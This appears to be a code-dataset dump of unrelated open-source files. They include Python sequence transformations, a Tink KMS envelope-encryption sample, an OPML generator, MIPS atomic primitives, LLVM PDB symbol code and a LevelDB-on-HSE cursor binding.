max_stars_count
int64
301
224k
text
stringlengths
6
1.05M
token_count
int64
3
727k
1,647
#ifndef PYTHONIC_UTILS_INT_HPP #define PYTHONIC_UTILS_INT_HPP #include "pythonic/include/utils/int_.hpp" #endif
55
1,350
<gh_stars>1000+ [{"id":"LNAME","type":"alpha","calc":true,"value":""},{"id":"SSN","type":"ssn","calc":true,"value":""},{"id":"POLICECD","type":"number","calc":false,"value":""},{"id":"STCD_1_","type":"alpha","calc":false,"value":""},{"id":"AMT_1_","type":"number","calc":false,"value":""},{"id":"STCD_2_","type":"alpha","calc":false,"value":""},{"id":"AMT_2_","type":"number","calc":false,"value":""},{"id":"STCD_3_","type":"alpha","calc":false,"value":""},{"id":"AMT_3_","type":"number","calc":false,"value":""},{"id":"STCD_4_","type":"alpha","calc":false,"value":""},{"id":"AMT_4_","type":"number","calc":false,"value":""},{"id":"AMTTOT","type":"number","calc":true,"value":""},{"id":"NONRFND","type":"number","calc":true,"value":""},{"id":"Add_Schedule_U_Line_4","type":"link","calc":false,"value":""},{"id":"Add_Schedule_U_Line_4","type":"link","calc":false,"value":""},{"id":"EITC","type":"number","calc":false,"value":""},{"id":"RFNDBL","type":"number","calc":true,"value":""},{"id":"STATEFND","type":"number","calc":false,"value":""},{"id":"DRUGTRST","type":"number","calc":false,"value":""},{"id":"ANACOST","type":"number","calc":false,"value":""},{"id":"REFUND","type":"number","calc":true,"value":""},{"id":"OWETAX","type":"number","calc":true,"value":""}]
417
1,995
from functools import partial from itertools import ( dropwhile, takewhile, islice, count, product, chain, starmap, filterfalse, ) import collections import types from functional.execution import ExecutionStrategies #: Defines a Transformation from a name, function, and execution_strategies Transformation = collections.namedtuple( "Transformation", ["name", "function", "execution_strategies"] ) #: Cache transformation CACHE_T = Transformation("cache", None, None) def name(function): """ Retrieve a pretty name for the function :param function: function to get name from :return: pretty name """ if isinstance(function, types.FunctionType): return function.__name__ else: return str(function) def map_t(func): """ Transformation for Sequence.map :param func: map function :return: transformation """ return Transformation( "map({0})".format(name(func)), partial(map, func), {ExecutionStrategies.PARALLEL}, ) def select_t(func): """ Transformation for Sequence.select :param func: select function :return: transformation """ return Transformation( "select({0})".format(name(func)), partial(map, func), {ExecutionStrategies.PARALLEL}, ) def starmap_t(func): """ Transformation for Sequence.starmap and Sequence.smap :param func: starmap function :return: transformation """ return Transformation( "starmap({})".format(name(func)), partial(starmap, func), {ExecutionStrategies.PARALLEL}, ) def filter_t(func): """ Transformation for Sequence.filter :param func: filter function :return: transformation """ return Transformation( "filter({0})".format(name(func)), partial(filter, func), {ExecutionStrategies.PARALLEL}, ) def where_t(func): """ Transformation for Sequence.where :param func: where function :return: transformation """ return Transformation( "where({0})".format(name(func)), partial(filter, func), {ExecutionStrategies.PARALLEL}, ) def filter_not_t(func): """ Transformation for Sequence.filter_not :param func: filter_not function :return: transformation """ return Transformation( "filter_not({0})".format(name(func)), partial(filterfalse, func), {ExecutionStrategies.PARALLEL}, ) def reversed_t(): """ Transformation for Sequence.reverse :return: transformation """ return Transformation("reversed", reversed, [ExecutionStrategies.PRE_COMPUTE]) def slice_t(start, until): """ Transformation for Sequence.slice :param start: start index :param until: until index (does not include element at until) :return: transformation """ return Transformation( "slice({0}, {1})".format(start, until), lambda sequence: islice(sequence, start, until), None, ) def distinct_t(): """ Transformation for Sequence.distinct :return: transformation """ def distinct(sequence): seen = set() for element in sequence: if element in seen: continue seen.add(element) yield element return Transformation("distinct", distinct, None) def distinct_by_t(func): """ Transformation for Sequence.distinct_by :param func: distinct_by function :return: transformation """ def distinct_by(sequence): distinct_lookup = {} for element in sequence: key = func(element) if key not in distinct_lookup: distinct_lookup[key] = element return distinct_lookup.values() return Transformation("distinct_by({0})".format(name(func)), distinct_by, None) def sorted_t(key=None, reverse=False): """ Transformation for Sequence.sorted :param key: key to sort by :param reverse: reverse or not :return: transformation """ return Transformation( "sorted", lambda sequence: sorted(sequence, key=key, reverse=reverse), None ) def order_by_t(func): """ Transformation for Sequence.order_by :param func: order_by function :return: transformation """ return Transformation( "order_by({0})".format(name(func)), lambda sequence: sorted(sequence, key=func), None, ) def drop_right_t(n): """ Transformation for Sequence.drop_right :param n: number to drop from right :return: transformation """ if n <= 0: end_index = None else: end_index = -n return Transformation( "drop_right({0})".format(n), lambda sequence: sequence[:end_index], [ExecutionStrategies.PRE_COMPUTE], ) def drop_t(n): """ Transformation for Sequence.drop :param n: number to drop from left :return: transformation """ return Transformation( "drop({0})".format(n), lambda sequence: islice(sequence, n, None), None ) def drop_while_t(func): """ Transformation for Sequence.drop_while :param func: drops while func is true :return: transformation """ return Transformation( "drop_while({0})".format(name(func)), partial(dropwhile, func), None ) def take_t(n): """ Transformation for Sequence.take :param n: number to take :return: transformation """ return Transformation( "take({0})".format(n), lambda sequence: islice(sequence, 0, n), None ) def take_while_t(func): """ Transformation for Sequence.take_while :param func: takes while func is True :return: transformation """ return Transformation( "take_while({0})".format(name(func)), partial(takewhile, func), None ) def flat_map_impl(func, sequence): """ Implementation for flat_map_t :param func: function to map :param sequence: sequence to flat_map over :return: flat_map generator """ for element in sequence: for value in func(element): yield value def flat_map_t(func): """ Transformation for Sequence.flat_map :param func: function to flat_map :return: transformation """ return Transformation( "flat_map({0})".format(name(func)), partial(flat_map_impl, func), {ExecutionStrategies.PARALLEL}, ) def flatten_t(): """ Transformation for Sequence.flatten :return: transformation """ return Transformation( "flatten", partial(flat_map_impl, lambda x: x), {ExecutionStrategies.PARALLEL} ) def zip_t(zip_sequence): """ Transformation for Sequence.zip :param zip_sequence: sequence to zip with :return: transformation """ return Transformation( "zip(<sequence>)", lambda sequence: zip(sequence, zip_sequence), None ) def zip_with_index_t(start): """ Transformation for Sequence.zip_with_index :return: transformation """ return Transformation( "zip_with_index", lambda sequence: zip(sequence, count(start=start)), None ) def enumerate_t(start): """ Transformation for Sequence.enumerate :param start: start index for enumerate :return: transformation """ return Transformation( "enumerate", lambda sequence: enumerate(sequence, start=start), None ) def cartesian_t(iterables, repeat): """ Transformation for Sequence.cartesian :param iterables: elements for cartesian product :param repeat: how many times to repeat iterables :return: transformation """ return Transformation( "cartesian", lambda sequence: product(sequence, *iterables, repeat=repeat), None ) def init_t(): """ Transformation for Sequence.init :return: transformation """ return Transformation( "init", lambda sequence: sequence[:-1], {ExecutionStrategies.PRE_COMPUTE} ) def tail_t(): """ Transformation for Sequence.tail :return: transformation """ return Transformation("tail", lambda sequence: islice(sequence, 1, None), None) def inits_t(wrap): """ Transformation for Sequence.inits :param wrap: wrap children values with this :return: transformation """ return Transformation( "inits", lambda sequence: [ wrap(sequence[:i]) for i in reversed(range(len(sequence) + 1)) ], {ExecutionStrategies.PRE_COMPUTE}, ) def tails_t(wrap): """ Transformation for Sequence.tails :param wrap: wrap children values with this :return: transformation """ return Transformation( "tails", lambda sequence: [wrap(sequence[i:]) for i in range(len(sequence) + 1)], {ExecutionStrategies.PRE_COMPUTE}, ) def union_t(other): """ Transformation for Sequence.union :param other: sequence to union with :return: transformation """ return Transformation("union", lambda sequence: set(sequence).union(other), None) def intersection_t(other): """ Transformation for Sequence.intersection :param other: sequence to intersect with :return: transformation """ return Transformation( "intersection", lambda sequence: set(sequence).intersection(other), None ) def difference_t(other): """ Transformation for Sequence.difference :param other: sequence to different with :return: transformation """ return Transformation( "difference", lambda sequence: set(sequence).difference(other), None ) def symmetric_difference_t(other): """ Transformation for Sequence.symmetric_difference :param other: sequence to symmetric_difference with :return: transformation """ return Transformation( "symmetric_difference", lambda sequence: set(sequence).symmetric_difference(other), None, ) def group_by_key_impl(sequence): """ Implementation for group_by_key_t :param sequence: sequence to group :return: grouped sequence """ result = {} for element in sequence: if result.get(element[0]): result.get(element[0]).append(element[1]) else: result[element[0]] = [element[1]] return result.items() def group_by_key_t(): """ Transformation for Sequence.group_by_key :return: transformation """ return Transformation("group_by_key", group_by_key_impl, None) def reduce_by_key_impl(func, sequence): """ Implementation for reduce_by_key_t :param func: reduce function :param sequence: sequence to reduce :return: reduced sequence """ result = {} for key, value in sequence: if key in result: result[key] = func(result[key], value) else: result[key] = value return result.items() def reduce_by_key_t(func): """ Transformation for Sequence.reduce_by_key :param func: reduce function :return: transformation """ return Transformation( "reduce_by_key({0})".format(name(func)), partial(reduce_by_key_impl, func), None ) def accumulate_impl(func, sequence): # pylint: disable=no-name-in-module """ Implementation for accumulate :param sequence: sequence to accumulate :param func: accumulate function """ from itertools import accumulate return accumulate(sequence, func) def accumulate_t(func): """ Transformation for Sequence.accumulate """ return Transformation( "accumulate({0})".format(name(func)), partial(accumulate_impl, func), None ) def count_by_key_impl(sequence): """ Implementation for count_by_key_t :param sequence: sequence of (key, value) pairs :return: counts by key """ counter = collections.Counter() for key, _ in sequence: counter[key] += 1 return counter.items() def count_by_key_t(): """ Transformation for Sequence.count_by_key :return: transformation """ return Transformation("count_by_key", count_by_key_impl, None) def count_by_value_impl(sequence): """ Implementation for count_by_value_t :param sequence: sequence of values :return: counts by value """ counter = collections.Counter() for e in sequence: counter[e] += 1 return counter.items() def count_by_value_t(): """ Transformation for Sequence.count_by_value :return: transformation """ return Transformation("count_by_value", count_by_value_impl, None) def group_by_impl(func, sequence): """ Implementation for group_by_t :param func: grouping function :param sequence: sequence to group :return: grouped sequence """ result = {} for element in sequence: if result.get(func(element)): result.get(func(element)).append(element) else: result[func(element)] = [element] return result.items() def group_by_t(func): """ Transformation for Sequence.group_by :param func: grouping function :return: transformation """ return Transformation( "group_by({0})".format(name(func)), partial(group_by_impl, func), None ) def grouped_impl(size, sequence): """ Implementation for grouped_t :param size: size of groups :param sequence: sequence to group :return: grouped sequence """ iterator = iter(sequence) try: while True: batch = islice(iterator, size) yield list(chain((next(batch),), batch)) except StopIteration: return def grouped_t(size): """ Transformation for Sequence.grouped :param size: size of groups :return: transformation """ return Transformation( "grouped({0})".format(size), partial(grouped_impl, size), None ) def sliding_impl(wrap, size, step, sequence): """ Implementation for sliding_t :param wrap: wrap children values with this :param size: size of window :param step: step size :param sequence: sequence to create sliding windows from :return: sequence of sliding windows """ i = 0 n = len(sequence) while i + size <= n or (step != 1 and i < n): yield wrap(sequence[i : i + size]) i += step def sliding_t(wrap, size, step): """ Transformation for Sequence.sliding :param wrap: wrap children values with this :param size: size of window :param step: step size :return: transformation """ return Transformation( "sliding({0}, {1})".format(size, step), partial(sliding_impl, wrap, size, step), {ExecutionStrategies.PRE_COMPUTE}, ) def partition_impl(wrap, predicate, sequence): truthy_partition = [] falsy_partition = [] for e in sequence: if predicate(e): truthy_partition.append(e) else: falsy_partition.append(e) return wrap((wrap(truthy_partition), wrap(falsy_partition))) def partition_t(wrap, func): """ Transformation for Sequence.partition :param wrap: wrap children values with this :param func: partition function :return: transformation """ return Transformation( "partition({0})".format(name(func)), partial(partition_impl, wrap, func), None ) def inner_join_impl(other, sequence): """ Implementation for part of join_impl :param other: other sequence to join with :param sequence: first sequence to join with :return: joined sequence """ seq_dict = {} for element in sequence: seq_dict[element[0]] = element[1] seq_kv = seq_dict other_kv = dict(other) keys = seq_kv.keys() if len(seq_kv) < len(other_kv) else other_kv.keys() result = {} for k in keys: if k in seq_kv and k in other_kv: result[k] = (seq_kv[k], other_kv[k]) return result.items() def join_impl(other, join_type, sequence): """ Implementation for join_t :param other: other sequence to join with :param join_type: join type (inner, outer, left, right) :param sequence: first sequence to join with :return: joined sequence """ if join_type == "inner": return inner_join_impl(other, sequence) seq_dict = {} for element in sequence: seq_dict[element[0]] = element[1] seq_kv = seq_dict other_kv = dict(other) if join_type == "left": keys = seq_kv.keys() elif join_type == "right": keys = other_kv.keys() elif join_type == "outer": keys = set(list(seq_kv.keys()) + list(other_kv.keys())) else: raise TypeError("Wrong type of join specified") result = {} for k in keys: result[k] = (seq_kv.get(k), other_kv.get(k)) return result.items() def join_t(other, join_type): """ Transformation for Sequence.join, Sequence.inner_join, Sequence.outer_join, Sequence.right_join, and Sequence.left_join :param other: other sequence to join with :param join_type: join type from left, right, inner, and outer :return: transformation """ return Transformation( "{0}_join".format(join_type), partial(join_impl, other, join_type), None )
6,540
1,561
<gh_stars>1000+ /* * Copyright 2021 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package cloudsql.tink; // [START cloud_sql_sqlserver_cse_key] import com.google.crypto.tink.Aead; import com.google.crypto.tink.KmsClient; import com.google.crypto.tink.aead.AeadConfig; import com.google.crypto.tink.aead.AeadKeyTemplates; import com.google.crypto.tink.aead.KmsEnvelopeAead; import com.google.crypto.tink.integration.gcpkms.GcpKmsClient; import java.security.GeneralSecurityException; public class CloudKmsEnvelopeAead { public static Aead get(String kmsUri) throws GeneralSecurityException { AeadConfig.register(); // Create a new KMS Client KmsClient client = new GcpKmsClient().withDefaultCredentials(); // Create an AEAD primitive using the Cloud KMS key Aead gcpAead = client.getAead(kmsUri); // Create an envelope AEAD primitive. // This key should only be used for client-side encryption to ensure authenticity and integrity // of data. return new KmsEnvelopeAead(AeadKeyTemplates.AES128_GCM, gcpAead); } } // [END cloud_sql_sqlserver_cse_key]
520
1,043
<filename>micro-events/src/main/java/com/oath/micro/server/events/StartedAt.java package com.oath.micro.server.events; public interface StartedAt { public long getStartedAt(); }
61
2,112
/** * Autogenerated by Thrift * * DO NOT EDIT UNLESS YOU ARE SURE THAT YOU KNOW WHAT YOU ARE DOING * @generated */ package test.fixtures.enums; import com.facebook.swift.codec.*; @SwiftGenerated public enum Metasyntactic { FOO(1), BAR(2), BAZ(3), BAX(4); private final int value; Metasyntactic(int value) { this.value = value; } @ThriftEnumValue public int getValue() { return value; } public static Metasyntactic fromInteger(int n) { switch (n) { case 1: return FOO; case 2: return BAR; case 3: return BAZ; case 4: return BAX; default: return null; } } }
369
347
<reponame>hbraha/ovirt-engine package org.ovirt.engine.core.bll.executor; public interface CommandControllerMXBean { void monitorAll(boolean monitor); void monitorActions(boolean monitor); void monitorQueries(boolean monitor); void monitorVdsBroker(boolean monitor); boolean isMonitorActionsEnabled(); boolean isMonitorQueriesEnabled(); boolean isMonitorVdsBrokerEnabled(); }
131
404
<filename>java-backend/src/main/java/org/kframework/backend/java/symbolic/VariableOccurrencesCounter.java // Copyright (c) 2014-2019 K Team. All Rights Reserved. package org.kframework.backend.java.symbolic; import org.kframework.backend.java.kil.Term; import org.kframework.backend.java.kil.Variable; import com.google.common.collect.HashMultiset; import com.google.common.collect.Multiset; /** * Counts the occurrences of all variables inside a {@link Term}. * * @author YilongL * */ public class VariableOccurrencesCounter extends BottomUpVisitor { private final Multiset<Variable> variables = HashMultiset.create(); private VariableOccurrencesCounter() { } @Override public void visit(Variable variable) { variables.add(variable); } public static Multiset<Variable> count(Term term) { VariableOccurrencesCounter counter = new VariableOccurrencesCounter(); term.accept(counter); return counter.variables; } }
324
1,980
#include "modules_enum.h" #include <psapi.h> #pragma comment(lib,"psapi.lib") size_t pesieve::util::enum_modules(IN HANDLE hProcess, IN OUT HMODULE hMods[], IN const DWORD hModsMax, IN DWORD filters) //throws exceptions { if (hProcess == nullptr) { return 0; } const char err_msg[] = "Could not enumerate modules. "; DWORD cbNeeded; #ifdef _WIN64 if (!EnumProcessModulesEx(hProcess, hMods, hModsMax, &cbNeeded, filters)) { throw std::runtime_error(err_msg); return 0; } #else /* Some old, 32-bit versions of Windows do not have EnumProcessModulesEx, but we can use EnumProcessModules for the 32-bit version: it will work the same and prevent the compatibility issues. */ if (!EnumProcessModules(hProcess, hMods, hModsMax, &cbNeeded)) { throw std::runtime_error(err_msg); return 0; } #endif const size_t modules_count = cbNeeded / sizeof(HMODULE); return modules_count; }
330
348
{"nom":"Saint-Félix","circ":"2ème circonscription","dpt":"Lot","inscrits":359,"abs":161,"votants":198,"blancs":13,"nuls":9,"exp":176,"res":[{"nuance":"REM","nom":"<NAME>","voix":100},{"nuance":"SOC","nom":"<NAME>","voix":76}]}
91
1,770
<filename>hyperion-sqlite/src/main/java/com/willowtreeapps/hyperion/sqlite/presentation/database/DatabaseListActivity.java package com.willowtreeapps.hyperion.sqlite.presentation.database; import android.os.Bundle; import androidx.annotation.Nullable; import androidx.appcompat.app.ActionBar; import androidx.appcompat.app.AppCompatActivity; import androidx.recyclerview.widget.LinearLayoutManager; import androidx.recyclerview.widget.RecyclerView; import androidx.appcompat.widget.Toolbar; import com.willowtreeapps.hyperion.plugin.v1.HyperionIgnore; import com.willowtreeapps.hyperion.sqlite.R; import com.willowtreeapps.hyperion.sqlite.presentation.tables.TablesListActivity; import java.util.ArrayList; import java.util.HashSet; import java.util.List; import java.util.Set; @HyperionIgnore public class DatabaseListActivity extends AppCompatActivity implements DatabaseListAdapter.OnDatabaseSelectedListener { @Override protected void onCreate(@Nullable Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.hsql_database_list); setSupportActionBar((Toolbar) findViewById(R.id.hsql_toolbar)); ActionBar actionBar = getSupportActionBar(); if (actionBar != null) { actionBar.setDisplayHomeAsUpEnabled(true); actionBar.setTitle(R.string.hsql_database_list_heading); } final RecyclerView list = findViewById(R.id.hsql_list); list.setLayoutManager(new LinearLayoutManager(this)); final List<String> databaseList = fetchDatabaseList(); DatabaseListAdapter adapter = new DatabaseListAdapter(databaseList); adapter.setListener(this); list.setAdapter(adapter); } @Override public boolean onSupportNavigateUp() { onBackPressed(); return true; } private List<String> fetchDatabaseList() { Set<String> dbNames = new HashSet<>(); for (String db : databaseList()) { if (!db.endsWith("-journal") && !db.endsWith("-wal") && !db.endsWith("-shm")) { dbNames.add(db); } } return new ArrayList<>(dbNames); } @Override public void onClick(String databaseName) { TablesListActivity.startActivity(this, databaseName); } }
863
12,718
#if __mips_isa_rev < 6 #define LLSC_M "m" #else #define LLSC_M "ZC" #endif #define a_ll a_ll static inline int a_ll(volatile int *p) { int v; #if __mips < 2 __asm__ __volatile__ ( ".set push ; .set mips2\n\t" "ll %0, %1" "\n\t.set pop" : "=r"(v) : "m"(*p)); #else __asm__ __volatile__ ( "ll %0, %1" : "=r"(v) : LLSC_M(*p)); #endif return v; } #define a_sc a_sc static inline int a_sc(volatile int *p, int v) { int r; #if __mips < 2 __asm__ __volatile__ ( ".set push ; .set mips2\n\t" "sc %0, %1" "\n\t.set pop" : "=r"(r), "=m"(*p) : "0"(v) : "memory"); #else __asm__ __volatile__ ( "sc %0, %1" : "=r"(r), "="LLSC_M(*p) : "0"(v) : "memory"); #endif return r; } #define a_barrier a_barrier static inline void a_barrier() { #if __mips < 2 /* mips2 sync, but using too many directives causes * gcc not to inline it, so encode with .long instead. */ __asm__ __volatile__ (".long 0xf" : : : "memory"); #else __asm__ __volatile__ ("sync" : : : "memory"); #endif } #define a_pre_llsc a_barrier #define a_post_llsc a_barrier #undef LLSC_M
524
558
<reponame>leroyjvargis/workflows // SPDX-License-Identifier: BSD-3-Clause // // Copyright (C) 2021 Micron Technology, Inc. // // This code is derived from and modifies the LevelDB project. #include "hse_binding/hse_kvs_cursor.h" #include <hse/hse.h> #include "leveldb/status.h" namespace leveldb { static const int MSG_SIZE = 100; HseKvsCursor::HseKvsCursor(hse_kvs_cursor* handle) : kvs_cursor_handle_(handle), current_key_(nullptr), current_value_(nullptr), current_key_size_(0), current_value_size_(0), valid_(false) {} HseKvsCursor::~HseKvsCursor() { if (kvs_cursor_handle_ != nullptr) { hse_kvs_cursor_destroy(kvs_cursor_handle_); } } Slice HseKvsCursor::key() { return Slice((const char*)current_key_, current_key_size_); } Slice HseKvsCursor::value() { return Slice((const char*)current_value_, current_value_size_); } void HseKvsCursor::Read() { hse_err_t err; bool eof; err = hse_kvs_cursor_read(kvs_cursor_handle_, 0, &current_key_, &current_key_size_, &current_value_, &current_value_size_, &eof); if (err) { char msg[MSG_SIZE]; valid_ = false; current_key_ = nullptr; current_value_ = nullptr; hse_strerror(err, msg, sizeof(msg)); std::fprintf(stderr, "cursor read error: %s\n", msg); } else if (eof) { valid_ = false; } else { valid_ = true; } } void HseKvsCursor::Seek(const Slice& target) { hse_err_t err; err = hse_kvs_cursor_seek(kvs_cursor_handle_, 0, target.data(), target.size(), nullptr, nullptr); if (err) { char msg[MSG_SIZE]; hse_strerror(err, msg, sizeof(msg)); std::fprintf(stderr, "cursor seek error: %s\n", msg); valid_ = false; } else { valid_ = true; } } bool HseKvsCursor::Valid() { return valid_; } } // namespace leveldb
871
582
<filename>pocs/apache_shrio_deserialize_CVE-2016-4437/2.py # -*- encoding:utf-8 -*- import sys import base64 import uuid import subprocess import requests from Crypto.Cipher import AES def encode_rememberme(command): JAR_FILE = './ysoserial-0.0.6-SNAPSHOT-BETA-all.jar' popen = subprocess.Popen(['java', '-jar',JAR_FILE, 'CommonsCollections2', command], stdout=subprocess.PIPE) BS = AES.block_size pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() key = "<KEY> mode = AES.MODE_CBC iv = uuid.uuid4().bytes encryptor = AES.new(base64.b64decode(key), mode, iv) file_body = pad(popen.stdout.read()) base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body)) return base64_ciphertext def request(url,headers): requests.post(url=url, data="", headers=headers,verify=False) if __name__ == '__main__': url= "http://1172.16.17.32/login.do" cmd= "ping apache.dnslog.org" payload = encode_rememberme(cmd) headers = { "Cookie": "rememberMe=%s" % (payload.decode()) } print payload request(url,headers) print "END===="
464
651
package net.serenitybdd.screenplay.jenkins; import net.serenitybdd.screenplay.Actor; import java.util.UUID; public class JenkinsUser extends Actor { public static JenkinsUser named(String username) { return new JenkinsUser(username, UUID.randomUUID().toString()); } private final String password; public JenkinsUser(String name, String password) { super(name); this.password = password; } public String password() { return password; } }
177
759
<reponame>tonytw1/rome /* * Opml10Generator.java * * Created on April 24, 2006, 11:35 PM * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.rometools.opml.io.impl; import java.util.ArrayList; import java.util.Collections; import java.util.List; import java.util.Locale; import org.jdom2.Document; import org.jdom2.Element; import com.rometools.opml.feed.opml.Attribute; import com.rometools.opml.feed.opml.Opml; import com.rometools.opml.feed.opml.Outline; import com.rometools.rome.feed.WireFeed; import com.rometools.rome.io.FeedException; import com.rometools.rome.io.WireFeedGenerator; import com.rometools.rome.io.impl.BaseWireFeedGenerator; import com.rometools.rome.io.impl.DateParser; public class OPML10Generator extends BaseWireFeedGenerator implements WireFeedGenerator { public OPML10Generator() { super("opml_1.0"); } public OPML10Generator(final String type) { super(type); } /** * Creates an XML document (JDOM) for the given feed bean. * * @param feed the feed bean to generate the XML document from. * @return the generated XML document (JDOM). * @throws IllegalArgumentException thrown if the type of the given feed bean does not match with the type of the * WireFeedGenerator. * @throws FeedException thrown if the XML Document could not be created. */ @Override public Document generate(final WireFeed feed) throws IllegalArgumentException, FeedException { if (!(feed instanceof Opml)) { throw new IllegalArgumentException("Not an OPML file"); } final Opml opml = (Opml) feed; final Document doc = new Document(); final Element root = new Element("opml"); root.setAttribute("version", "1.0"); doc.addContent(root); final Element head = generateHead(opml); if (head != null) { root.addContent(head); } final Element body = new Element("body"); root.addContent(body); super.generateFeedModules(opml.getModules(), root); body.addContent(generateOutlines(opml.getOutlines())); return doc; } protected boolean addNotNullAttribute(final Element target, final String name, final Object value) { if (target == null || name == null || value == null) { return false; } target.setAttribute(name, value.toString()); return true; } protected boolean addNotNullSimpleElement(final Element target, final String name, final Object value) { if (target == null || name == null || value == null) { return false; } final Element e = new Element(name); e.addContent(value.toString()); target.addContent(e); return true; } protected Element generateHead(final Opml opml) { final Element head = new Element("head"); boolean hasHead = false; if (opml.getCreated() != null) { hasHead |= addNotNullSimpleElement(head, "dateCreated", DateParser.formatRFC822(opml.getCreated(), Locale.US)); } hasHead |= addNotNullSimpleElement(head, "expansionState", intArrayToCsvString(opml.getExpansionState())); if (opml.getModified() != null) { hasHead |= addNotNullSimpleElement(head, "dateModified", DateParser.formatRFC822(opml.getModified(), Locale.US)); } hasHead |= addNotNullSimpleElement(head, "ownerEmail", opml.getOwnerEmail()); hasHead |= addNotNullSimpleElement(head, "ownerName", opml.getOwnerName()); hasHead |= addNotNullSimpleElement(head, "title", opml.getTitle()); hasHead |= addNotNullSimpleElement(head, "vertScrollState", opml.getVerticalScrollState()); hasHead |= addNotNullSimpleElement(head, "windowBottom", opml.getWindowBottom()); hasHead |= addNotNullSimpleElement(head, "windowLeft", opml.getWindowLeft()); hasHead |= addNotNullSimpleElement(head, "windowRight", opml.getWindowRight()); hasHead |= addNotNullSimpleElement(head, "windowTop", opml.getWindowTop()); if (hasHead) { return head; } else { return null; } } protected Element generateOutline(final Outline outline) { final Element e = new Element("outline"); addNotNullAttribute(e, "text", outline.getText()); addNotNullAttribute(e, "type", outline.getType()); addNotNullAttribute(e, "title", outline.getTitle()); if (outline.isBreakpoint()) { addNotNullAttribute(e, "isBreakpoint", "true"); } if (outline.isComment()) { addNotNullAttribute(e, "isComment", "true"); } final List<Attribute> atts = Collections.synchronizedList(outline.getAttributes()); for (int i = 0; i < atts.size(); i++) { final Attribute att = atts.get(i); addNotNullAttribute(e, att.getName(), att.getValue()); } super.generateItemModules(outline.getModules(), e); e.addContent(generateOutlines(outline.getChildren())); return e; } protected List<Element> generateOutlines(final List<Outline> outlines) { final ArrayList<Element> elements = new ArrayList<Element>(); for (int i = 0; outlines != null && i < outlines.size(); i++) { elements.add(generateOutline(outlines.get(i))); } return elements; } protected String intArrayToCsvString(final int[] value) { if (value == null || value.length == 0) { return null; } final StringBuffer sb = new StringBuffer(); sb.append(value[0]); for (int i = 1; i < value.length; i++) { sb.append(","); sb.append(value[i]); } return sb.toString(); } }
2,476
2,092
<gh_stars>1000+ """URL configuration for builds app.""" from django.conf.urls import url from django.views.generic.base import RedirectView urlpatterns = [ url( r'^(?P<project_slug>[-\w]+)/(?P<build_pk>\d+)/$', RedirectView.as_view(pattern_name='builds_detail', permanent=True), name='old_builds_detail', ), url( r'^(?P<project_slug>[-\w]+)/$', RedirectView.as_view(pattern_name='builds_project_list', permanent=True), name='old_builds_project_list', ), ]
237
72,551
//===--- TypeResolutionStage.h - Type Resolution Stage ----------*- C++ -*-===// // // This source file is part of the Swift.org open source project // // Copyright (c) 2014 - 2018 Apple Inc. and the Swift project authors // Licensed under Apache License v2.0 with Runtime Library Exception // // See https://swift.org/LICENSE.txt for license information // See https://swift.org/CONTRIBUTORS.txt for the list of Swift project authors // //===----------------------------------------------------------------------===// #ifndef SWIFT_AST_TYPE_RESOLUTION_STAGE_H #define SWIFT_AST_TYPE_RESOLUTION_STAGE_H namespace llvm { class raw_ostream; } namespace swift { /// Describes the stage at which a particular type should be computed. /// /// Later stages compute more information about the type, requiring more /// complete analysis. enum class TypeResolutionStage : uint8_t { /// Produces an interface type describing its structure, but without /// performing semantic analysis to resolve (e.g.) references to members of /// type parameters. Structural, /// Produces a complete interface type where all member references have been /// resolved. Interface, }; /// Display a type resolution stage. void simple_display(llvm::raw_ostream &out, const TypeResolutionStage &value); } // end namespace swift #endif // SWIFT_AST_TYPE_RESOLUTION_STAGE_H
365
6,989
#include "explicit_type.h"
11
4,812
//===- PDBSymbolData.cpp - PDB data (e.g. variable) accessors ---*- C++ -*-===// // // Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. // See https://llvm.org/LICENSE.txt for license information. // SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception // //===----------------------------------------------------------------------===// #include "llvm/DebugInfo/PDB/PDBSymbolData.h" #include "llvm/DebugInfo/PDB/IPDBSectionContrib.h" #include "llvm/DebugInfo/PDB/IPDBSession.h" #include "llvm/DebugInfo/PDB/PDBSymDumper.h" #include <utility> using namespace llvm; using namespace llvm::pdb; void PDBSymbolData::dump(PDBSymDumper &Dumper) const { Dumper.dump(*this); } std::unique_ptr<IPDBEnumLineNumbers> PDBSymbolData::getLineNumbers() const { auto Len = RawSymbol->getLength(); Len = Len ? Len : 1; if (auto RVA = RawSymbol->getRelativeVirtualAddress()) return Session.findLineNumbersByRVA(RVA, Len); if (auto Section = RawSymbol->getAddressSection()) return Session.findLineNumbersBySectOffset( Section, RawSymbol->getAddressOffset(), Len); return nullptr; } uint32_t PDBSymbolData::getCompilandId() const { if (auto Lines = getLineNumbers()) { if (auto FirstLine = Lines->getNext()) return FirstLine->getCompilandId(); } uint32_t DataSection = RawSymbol->getAddressSection(); uint32_t DataOffset = RawSymbol->getAddressOffset(); if (DataSection == 0) { if (auto RVA = RawSymbol->getRelativeVirtualAddress()) Session.addressForRVA(RVA, DataSection, DataOffset); } if (DataSection) { if (auto SecContribs = Session.getSectionContribs()) { while (auto Section = SecContribs->getNext()) { if (Section->getAddressSection() == DataSection && Section->getAddressOffset() <= DataOffset && (Section->getAddressOffset() + Section->getLength()) > DataOffset) return Section->getCompilandId(); } } } else { auto LexParentId = RawSymbol->getLexicalParentId(); while (auto LexParent = Session.getSymbolById(LexParentId)) { if (LexParent->getSymTag() == PDB_SymType::Exe) break; if (LexParent->getSymTag() == PDB_SymType::Compiland) return LexParentId; LexParentId = LexParent->getRawSymbol().getLexicalParentId(); } } return 0; }
852
965
